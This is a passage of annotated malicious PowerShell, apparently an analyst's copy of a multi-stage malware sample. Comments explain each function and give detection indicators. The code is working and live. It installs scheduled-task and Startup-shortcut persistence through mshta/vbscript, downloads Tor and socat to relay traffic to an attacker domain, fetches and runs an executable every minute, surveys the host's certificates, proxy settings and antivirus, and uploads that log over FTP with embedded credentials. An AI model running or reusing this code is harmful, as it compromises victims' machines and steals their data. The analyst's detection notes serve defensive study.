  # optionally delayed by $delay seconds. With $restart=1 a second trigger repeats
  # the task every minute for 20 years, so a killed payload is relaunched within a
  # minute. Battery restrictions are disabled so it also fires on laptops on
  # battery. The Default branch does the same through the
  # Microsoft.Win32.TaskScheduler library loaded by InitScheduller.
  # $schedulerType is read from the caller's scope (PowerShell dynamic scoping).
  # Detection: tasks whose action is mshta.exe with a "vbscript:" argument, a
  # random alphanumeric name and description, a logon trigger and (for the
  # downloader task) 1-minute repetition.
  655. param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir='');
  656. switch ($schedulerType) {
  657. $SH_TYPE_SCHEDULED_TASK {
  658. $Action = New-ScheduledTaskAction -Execute $cmd;
  659. if(-Not [String]::IsNullOrEmpty($params)){
  660. $Action.Arguments=$params;
  661. }
  662. if(-Not [String]::IsNullOrEmpty($dir)){
  663. $Action.WorkingDirectory=$dir;
  664. }
  665. $LogonTrigger = New-ScheduledTaskTrigger -AtLogOn;
  666. try{
  667. $LogonTrigger.UserId=$env:username;
  668. }catch{
  669. $LogonTrigger.User=$env:username;
  670. }
  671. if(-Not $delay -eq 0){
  672. $LogonTrigger.Delay=New-TimeSpan -Seconds $delay;
  673. }
  674. if($restart -eq 1){
  675. $TimeTrigger = New-ScheduledTaskTrigger -Once -At 12am -RepetitionInterval ([System.TimeSpan]::FromMinutes(1)) -RepetitionDuration ([System.TimeSpan]::FromDays(365 * 20));
  676. }
  677. $Settings = New-ScheduledTaskSettingsSet;
  678. $Settings.DisallowStartIfOnBatteries = $False;
  679. $Settings.StopIfGoingOnBatteries = $False;
  680. if($restart -eq 1){
  681. $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger,$TimeTrigger -Settings $Settings -TaskName $name -Description (RandomString);
  682. }else{
  683. $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger -Settings $Settings -TaskName $name -Description (RandomString);
  684. }
  685. Start-ScheduledTask -InputObject $Task;
  686. };
  687. Default {
  688. $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
  689. $td=$ts.NewTask();
  690. $td.RegistrationInfo.Description = (RandomString);
  691. $td.Settings.DisallowStartIfOnBatteries = $False;
  692. $td.Settings.StopIfGoingOnBatteries = $False;
  693. $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
  694. $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
  695. $LogonTrigger.StartBoundary=[System.DateTime]::Now;
  696. $LogonTrigger.UserId=$env:username;
  697. $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
  698. $td.Triggers.Add($LogonTrigger);
  699. if($restart -eq 1){
  700. $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
  701. $TimeTrigger.StartBoundary=[System.DateTime]::Now;
  702. $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(1);
  703. $TimeTrigger.Repetition.StopAtDurationEnd=$False;
  704. $td.Triggers.Add($TimeTrigger);
  705. }
  706. $tsf="Microsoft.Win32.TaskScheduler";
  707. $ExecAction=New-Object "$tsf.ExecAction"($cmd,$params,$dir);
  708. $td.Actions.Add($ExecAction);
  709. $task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
  710. $task.Run();
  711. };
  712. }
  713. }
  714. function nne {
  # Downloader: fetches the URL in $nhhrQGEpp to the path in $KZqZalXQzaGMBW,
  # trying in order Start-BitsTransfer, System.Net.WebClient.DownloadFile and
  # finally bitsadmin.exe /transfer through a hidden cmd.exe. It first widens
  # SecurityProtocol to SSL3 and TLS 1.0/1.1/1.2 (errors ignored). Returns $true
  # only if the destination file exists afterwards. The "Download X to Y" line goes
  # to the console (Write-Host), not to the log file.
  # Detection: BITS jobs and bitsadmin.exe launched from powershell.exe/cmd.exe.
  715. param([string]$nhhrQGEpp, [string]$KZqZalXQzaGMBW);
  716. $ErrorActionPreference = "Stop";
  717. Write-Host ("Download {0} to {1}" -f ($nhhrQGEpp, $KZqZalXQzaGMBW));
  718. try{
  719. [Net.ServicePointManager]::SecurityProtocol = "tls12, tls11, tls, ssl3";
  720. }catch{}
  721. try {
  722. Start-BitsTransfer -Source $nhhrQGEpp -Destination $KZqZalXQzaGMBW;
  723. }
  724. catch {
  725. #Write-Error $_ -ErrorAction Continue;
  726. try {
  727. (New-Object System.Net.WebClient).DownloadFile($nhhrQGEpp,$KZqZalXQzaGMBW);
  728. }
  729. catch {
  730. #Write-Error $_ -ErrorAction Continue;
  731. Start-Process "cmd.exe" -ArgumentList "/b /c bitsadmin /transfer /download /priority HIGH `"$nhhrQGEpp`" `"$KZqZalXQzaGMBW`"" -Wait -WindowStyle Hidden;
  732. }
  733. }finally{
  734. $ErrorActionPreference = "Continue";
  735. }
  736. if ( $(Try { Test-Path $KZqZalXQzaGMBW.trim() } Catch { $false })){
  737. return $true;
  738. }
  739. return $false;
  740. }
  741. function ZjLBbVj{
  # Main installer of the proxy stage. Sequence and the artefacts it leaves:
  #  - Downloads tor-win32-0.3.4.8.zip from dist.torproject.org (torbrowser/8.0.3
  #    directory) or two mirrors — the URLs are split with string concatenation to
  #    evade simple scanners — extracts it to %ALLUSERSPROFILE%\<random> and
  #    registers a logon task that starts tor.exe hidden via
  #    mshta.exe "vbscript:...WScript.Shell.Run(...,0,False)".
  #  - Adds Startup\msword.lnk pointing at mshta.exe. $vzfkFcawDbIUSya and
  #    $toawwyJljC are never assigned anywhere on this page, so that shortcut gets
  #    an empty working directory and no arguments (possibly an edited stage).
  #  - Downloads socat 1.7.2.1 (GitHub StudioEtrange/socat-windows, fallback
  #    blog.gentilkiwi.com) into %ALLUSERSPROFILE%\<random>\<random>\ and registers
  #    two more mshta/vbscript logon tasks plus Startup\acrobat.lnk and
  #    Startup\sync.lnk that run:
  #      socat 127.0.0.1:53904 -> %DOMAIN%:80   via SOCKS4A 127.0.0.1:9050 (Tor)
  #      socat 127.0.0.1:5588  -> %DOMAIN%:5588 via SOCKS4A 127.0.0.1:9050 (Tor)
  #    so traffic for the attacker domain (%DOMAIN% is a template placeholder) is
  #    relayed over Tor. Combined with the rogue CA from stages 1/2 and the PAC
  #    setting that CheckInstall looks for, this is consistent with interception of
  #    the victim's browsing through a local proxy (inference, not shown here).
  #  - Registers a task repeating every minute that runs powershell.exe to fetch
  #    http://127.0.0.1:5555/<random>.asp?ts&ip=<public IP from api.ipify.org> into
  #    %TEMP%\<random>.exe and execute it. Port 5555 is not one of the socat
  #    listeners above, so another component presumably provides it.
  # Detection: tor.exe / socat.exe under ProgramData, mshta.exe scheduled tasks,
  # local listeners on 53904 and 5588, outbound requests to api.ipify.org from
  # powershell.exe, and msword/acrobat/sync .lnk files in the Startup folder.
  742. $schedulerType = InitScheduller;
  743. $tf=$env:Temp+'\'+(RandomString)+'.zip';
  744. $gLRlOZOsud=$env:ALLUSERSPROFILE+'\'+(RandomString);
  745. $yXozjITRBzpQM=@([string]::Concat('https://di','st.t','orproject.org/'), [string]::Concat("https://mirror.oldsql.cc/t","or/di","st/"), [string]::Concat("https://to","rmirror.tb-itf-t","or.de/di","st/"));
  746. foreach ($pKUDFhhhvNZv in $yXozjITRBzpQM) {
  747. $maV=$pKUDFhhhvNZv+"torbrowser/8.0.3/t"+"or-win32-0.3.4.8.zip";
  748. if((nne $maV $tf)){
  749. break;
  750. }
  751. }
  752. if ((Test-Path $gLRlOZOsud) -eq 1){Remove-Item -Force -Recurse $gLRlOZOsud;}mkdir $gLRlOZOsud | Out-Null;
  753. mWwT $tf $gLRlOZOsud;
  754. Remove-Item -Force $tf;
  755. $HXnQ=$gLRlOZOsud+"\T"+"or\";
  756. $OEnwgbJEWJe="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"t"+"or.exe`",0,False))";
  757. FqCZvVAFIWkCT (RandomString) 'mshta.exe' $OEnwgbJEWJe 0 0 $HXnQ;
  758.  
  759. Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\msword.lnk" $vzfkFcawDbIUSya $toawwyJljC
  760.  
  761. $QDOKSGRmCckng=$env:Temp+'\'+(RandomString)+'.zip';
  762. $NNHcFwiW=(RandomString);
  763. $ytfOSwwAAgG=$gLRlOZOsud+'\'+$NNHcFwiW+'\';
  764. nne 'https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip' $QDOKSGRmCckng;
  765. if ( $(Try { Test-Path $QDOKSGRmCckng.trim() } Catch { $false })){
  766. mWwT $QDOKSGRmCckng $gLRlOZOsud;
  767. $BEqzKhTxCky=$gLRlOZOsud+'\socat-windows-1.7.2.1\';
  768. Rename-Item -path $BEqzKhTxCky -newName $NNHcFwiW;
  769. }else{
  770. nne 'http://blog.gentilkiwi.com/downloads/socat-1.7.2.1.zip' $QDOKSGRmCckng;
  771. mWwT $QDOKSGRmCckng $ytfOSwwAAgG;
  772. }
  773. Remove-Item -Force $QDOKSGRmCckng;
  774. $s1cmd='socat tcp4-LISTEN:53904,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:80,socksport=9050';
  775. $s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:5588,socksport=9050';
  776. $PwzNe="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))";
  777. $gLvFSMD="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))";
  778. FqCZvVAFIWkCT (RandomString) 'mshta.exe' $PwzNe 0 0 $ytfOSwwAAgG;
  779. FqCZvVAFIWkCT (RandomString) 'mshta.exe' $gLvFSMD 0 0 $ytfOSwwAAgG;
  780.  
  781. Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\acrobat.lnk" $ytfOSwwAAgG $PwzNe
  782. Add-Shortcut "$([System.Environment]::SystemDirectory)\mshta.exe" "$([System.Environment]::GetFolderPath('Startup'))\sync.lnk" $ytfOSwwAAgG $gLvFSMD
  783.  
  784. $jSfqYGyepyLvWfi="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'\\"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))";
  785. FqCZvVAFIWkCT (RandomString) 'mshta.exe' $jSfqYGyepyLvWfi 1;
  786. }
  787. ZjLBbVj; # stage 3 entry: Tor + socat relay install and persistence
  788.  
  789. $Logfile = $env:Temp+"\\$(gc env:computername).log"; # %TEMP%\<COMPUTERNAME>.log — filled by CheckInstall, exfiltrated and deleted by UploadLog
  790.  
  791. Function LogWrite
  792. {
  # Appends "[dd.MM.yyyy HH:mm:ss]::[message]" to $Logfile and echoes it to the
  # console. All survey output below goes through here.
  793. Param ([string]$logstring)
  794. $dt=Get-Date -Format "dd.MM.yyyy HH:mm:ss";
  795. $msg=[string]::Format("[{0}]::[{1}]",$dt,$logstring);
  796. Write-Host $msg;
  797. Add-content $Logfile -value $msg;
  798. }
  799. Function UploadLog
  800. {
  # Exfiltration: uploads $Logfile as <COMPUTERNAME>.log over plain FTP to
  # wx04.wadax.ne.jp (user co-j-jp, path /public_html/logs) with the credentials
  # embedded in the URL, then deletes the local copy. The FTP host, user name and
  # the <COMPUTERNAME>.log naming are usable indicators; FTP from powershell.exe
  # to this host should be blocked and alerted on.
  801. $dest = "ftp://co-j-jp:escoj2013@wx04.wadax.ne.jp/public_html/logs";
  802. $wc = New-Object -TypeName System.Net.WebClient;
  803. $wc.UploadFile("$dest/$(gc env:computername).log", $Logfile);
  804. Remove-Item -Path $Logfile;
  805. }
  806. function CheckInstall(){
  # Post-install survey, written to the log that UploadLog exfiltrates:
  #  - OS caption, service pack, architecture, version and MUI languages (WMI),
  #  - PowerShell version,
  #  - the user's Internet Settings AutoConfigURL (PAC) value — i.e. whether the
  #    proxy auto-config that another stage presumably set is in place,
  #  - certificates in CurrentUser\Root whose subject contains "COMODO RSA Extended
  #    Validation Secure Server CA 2" or "COMODO Certification Authority"
  #    (thumbprint and NotBefore), which suggests the CA installed by stages 1/2
  #    carries a COMODO-like subject — a good hunting query for the rogue CA,
  #  - running processes named tor* or socat* with their paths,
  #  - a listing of %ALLUSERSPROFILE% and of each sub-directory,
  #  - AV products registered in root\SecurityCenter2 AntiVirusProduct.
  # The "-NOT $x.count -eq 0" tests parse as "(-not $x.count) -eq 0", which is true
  # exactly when the count is non-zero, so the branches behave as intended.
  807. $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages);
  808. $wininfo.MUILanguages=$wininfo.MUILanguages -join ",";
  809. LogWrite("OS info: {0}" -f $wininfo -join "");
  810. if (test-path variable:psversiontable) {
  811. $version = $psversiontable.psversion;
  812. } else {
  813. $version = [version]"1.0.0.0";
  814. }
  815. LogWrite("Powershell version: {0}" -f $version);
  816. try {
  817. $pac=Get-ItemProperty 'hkcu:\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\'|Select -expand AutoConfigURL -ErrorAction Stop;
  818. LogWrite("Pac setted: '$pac'");
  819. }
  820. catch {
  821. LogWrite("ERROR: Pac not setted");
  822. }
  823. $Certs = @(Get-ChildItem cert:\CurrentUser\ROOT|Where-Object {$_.Subject -like "*COMODO RSA Extended Validation Secure Server CA 2*" -or $_.Subject -like "*COMODO Certification Authority*"}|ForEach-Object {"{0} ({1})" -f ($_.Thumbprint,$_.NotBefore)});
  824. if (-NOT $Certs.count -eq 0){
  825. LogWrite("Certs installed: '{0}'" -f ($Certs -join "; "));
  826. }else {
  827. LogWrite("Certs not found");
  828. }
  829. try{
  830. $proc = Get-Process | Where-Object {$_.ProcessName -like "tor*" -or $_.ProcessName -like "socat*"}|Select -Property @{ Name="Out"; Expression={"ID:{0}`nName:{1}`nPath:{2}`n-------------" -f $_.Id,$_.ProcessName,$_.Path}}|Select -expand Out;
  831. LogWrite("Proccess list:`n{0}" -f ($proc -join "`n"));
  832. }
  833. catch {
  834. LogWrite("ERROR: Can't get proccess list");
  835. }
  836. $DestTP=$env:ALLUSERSPROFILE;
  837. try{
  838. $dirs=dir($DestTP) -ErrorAction Stop;
  839. LogWrite("List dir [{0}]: {1}" -f ($DestTP, (($dirs|Select -expand Name) -join "; ")));
  840. foreach($dir in $dirs){
  841. try{
  842. $subdir=dir($dir.FullName) -ErrorAction Stop;
  843. LogWrite("List dir [{0}]:{1}" -f ($dir.FullName, (($subdir|Select -expand Name) -join "; ")));
  844. }
  845. catch{
  846. LogWrite("ERROR: Can't list dir {0}" -f $dir.FullName);
  847. }
  848. }
  849. }
  850. catch {
  851. LogWrite("ERROR: Can't list dir {0}" -f $DestTP);
  852. }
  853.  
  854. $avlist=(Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct" @psboundparameters|Select -expand DisplayName);
  855. if (-NOT $avlist.count -eq 0){
  856. LogWrite("Av installed: '{0}'" -f ($avlist -join "; "));
  857. }else {
  858. LogWrite("Av not found");
  859. }
  860. }
  861. function StartWork(){
  # Stage 4 driver: waits 3 seconds, runs the CheckInstall survey and uploads the
  # resulting log to the attacker's FTP server.
  862. LogWrite "Start Log module";
  863. Start-Sleep -s 3;
  864. CheckInstall;
  865. UploadLog;
  866. }
  867. StartWork; # stage 4 entry: survey + FTP exfiltration of the log